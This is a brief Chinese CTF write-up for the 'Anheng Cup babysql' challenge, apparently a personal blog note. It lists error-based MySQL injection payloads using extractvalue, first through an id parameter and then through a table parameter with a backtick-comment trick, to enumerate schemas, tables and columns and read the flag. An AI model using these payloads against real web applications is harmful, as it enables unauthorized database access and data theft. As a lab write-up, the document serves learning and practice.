安恒杯-babysql

 

 

1. 库名

?id=1 and extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))#

 

2. 表名

?id=1 and extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))#

 

3. 猜列名的时候出了问题

?id=1 and extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))#

 

测试table字段可以注入（参考http://www.bubuko.com/infodetail-2392442.html的wp）

1. 库名

?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,schema_name) from information_schema.schemata))%23`&id=1

 

2. 表名

?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,table_name) from information_schema.tables where table_schema='errorerror'))%23`&id=1 

 

3. 列名

?table=flag`%23` where 0=extractvalue(1,(select group_concat(0x3a,column_name) from information_schema.columns where table_name='error_flag'))%23`&id=1

 

4. 内容

?table=flag`%23` where 0=extractvalue(1,(select flag_you_will_never_know from error_flag))%23`&id=1

 

 

记录一下，方便之后查看

 

本文固定链接：http://www.cnblogs.com/hell0w/p/8120585.html

转载于:https://www.cnblogs.com/hell0w/p/8120585.html